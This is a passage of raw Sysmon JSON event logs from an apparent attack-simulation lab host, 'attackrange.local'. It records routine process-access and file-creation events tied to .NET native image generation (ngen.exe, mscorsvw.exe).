C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:21.418","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04B9-5F25-0000-001059351000}","TargetProcessId":"2764","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7432,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:21.715\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04B9-5F25-0000-00105D3A1000}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:21.715","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04B9-5F25-0000-00105D3A1000}","TargetProcessId":"1540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7433,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:21.715\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04B9-5F25-0000-00105D3A1000}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:21.715","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04B9-5F25-0000-00105D3A1000}","TargetProcessId":"1540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7434,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:21.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04B9-5F25-0000-00105D3A1000}\r\nTargetProcessId: 1540\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:21.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04B9-5F25-0000-00105D3A1000}","TargetProcessId":"1540","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7435,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:23.356\r\nProcessGuid: {A837DB8D-04B9-5F25-0000-00105D3A1000}\r\nProcessId: 1540\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\604-0\\System.Data.Services.dll\r\nCreationUtcTime: 2020-08-01 05:59:23.356","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:23.356","ProcessGuid":"{A837DB8D-04B9-5F25-0000-00105D3A1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\604-0\\System.Data.Services.dll","CreationUtcTime":"2020-08-01 05:59:23.356","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7436,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:23.418\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04BB-5F25-0000-001056411000}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:23.418","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04BB-5F25-0000-001056411000}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7437,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:23.418\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04BB-5F25-0000-001056411000}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:23.418","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04BB-5F25-0000-001056411000}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7438,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:23.434\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04BB-5F25-0000-001056411000}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:23.434","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04BB-5F25-0000-001056411000}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:23","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7439,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:23.496\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048B-5F25-0000-001078C00D00}\r\nTargetProcessId: 4308\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:23.496","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048B-5F25-0000-001078C00D00}","TargetProcessId":"4308","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
